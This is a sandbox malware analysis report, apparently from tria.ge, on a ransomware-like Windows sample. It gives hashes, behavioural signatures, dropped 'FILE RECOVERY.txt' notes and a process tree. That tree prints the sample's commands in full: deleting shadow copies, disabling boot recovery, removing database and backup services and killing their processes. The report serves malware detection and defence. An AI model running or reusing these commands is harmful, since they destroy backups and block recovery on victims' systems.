Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
4s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23/09/2022, 16:04
Behavioral task
behavioral1
Sample
ReportingServecesService.exe
Resource
win7-20220812-en
General
-
Target
ReportingServecesService.exe
-
Size
158KB
-
MD5
a8e214683307adaff39783dc656b398a
-
SHA1
a4f0e624bd1292130ac46d242e42f33b724665bf
-
SHA256
df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a
-
SHA512
9dacd78fdecc64fb5ead740e5e3cd4248bf46a45f1c70dbde950a8231a44dedd961a6f05d44983accfa519193ea466901ac7e7e6725b66fed9fe2e4ccf10429c
-
SSDEEP
3072:y15pcSM4lVY8n8q4wJ8YB5mvig79NvGBdY04cABYK5lht9Raz+BVfRoio+00C/:y15pcKVfJ8MI7XvQLfAW6t5BdFC/
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: ReportingServecesService.exe File opened (read-only) \??\A: ReportingServecesService.exe File opened (read-only) \??\G: ReportingServecesService.exe File opened (read-only) \??\I: ReportingServecesService.exe File opened (read-only) \??\J: ReportingServecesService.exe File opened (read-only) \??\S: ReportingServecesService.exe File opened (read-only) \??\T: ReportingServecesService.exe File opened (read-only) \??\V: ReportingServecesService.exe File opened (read-only) \??\X: ReportingServecesService.exe File opened (read-only) \??\F: ReportingServecesService.exe File opened (read-only) \??\H: ReportingServecesService.exe File opened (read-only) \??\N: ReportingServecesService.exe File opened (read-only) \??\Q: ReportingServecesService.exe File opened (read-only) \??\M: ReportingServecesService.exe File opened (read-only) \??\O: ReportingServecesService.exe File opened (read-only) \??\U: ReportingServecesService.exe File opened (read-only) \??\W: ReportingServecesService.exe File opened (read-only) \??\B: ReportingServecesService.exe File opened (read-only) \??\E: ReportingServecesService.exe File opened (read-only) \??\K: ReportingServecesService.exe File opened (read-only) \??\L: ReportingServecesService.exe File opened (read-only) \??\Y: ReportingServecesService.exe File opened (read-only) \??\Z: ReportingServecesService.exe File opened (read-only) \??\P: ReportingServecesService.exe -
Drops file in Program Files directory 18 IoCs
description ioc Process File created C:\Program Files\DVD Maker\en-US\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\7-Zip\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\es-ES\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\ja-JP\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\it-IT\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\de-DE\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\fr-FR\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\FILE RECOVERY.txt ReportingServecesService.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\FILE RECOVERY.txt ReportingServecesService.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2028 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1144 ReportingServecesService.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 1144 ReportingServecesService.exe Token: SeDebugPrivilege 1144 ReportingServecesService.exe Token: SeBackupPrivilege 1976 vssvc.exe Token: SeRestorePrivilege 1976 vssvc.exe Token: SeAuditPrivilege 1976 vssvc.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1144 wrote to memory of 2028 1144 ReportingServecesService.exe 28 PID 1144 wrote to memory of 2028 1144 ReportingServecesService.exe 28 PID 1144 wrote to memory of 2028 1144 ReportingServecesService.exe 28 PID 1144 wrote to memory of 2028 1144 ReportingServecesService.exe 28 PID 1144 wrote to memory of 684 1144 ReportingServecesService.exe 32 PID 1144 wrote to memory of 684 1144 ReportingServecesService.exe 32 PID 1144 wrote to memory of 684 1144 ReportingServecesService.exe 32 PID 1144 wrote to memory of 684 1144 ReportingServecesService.exe 32 PID 1144 wrote to memory of 520 1144 ReportingServecesService.exe 31 PID 1144 wrote to memory of 520 1144 ReportingServecesService.exe 31 PID 1144 wrote to memory of 520 1144 ReportingServecesService.exe 31 PID 1144 wrote to memory of 520 1144 ReportingServecesService.exe 31 PID 1144 wrote to memory of 1552 1144 ReportingServecesService.exe 35 PID 1144 wrote to memory of 1552 1144 ReportingServecesService.exe 35 PID 1144 wrote to memory of 1552 1144 ReportingServecesService.exe 35 PID 1144 wrote to memory of 1552 1144 ReportingServecesService.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\ReportingServecesService.exe"C:\Users\Admin\AppData\Local\Temp\ReportingServecesService.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2028
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵PID:520
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&&&&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer2⤵PID:684
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no2⤵PID:1552
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976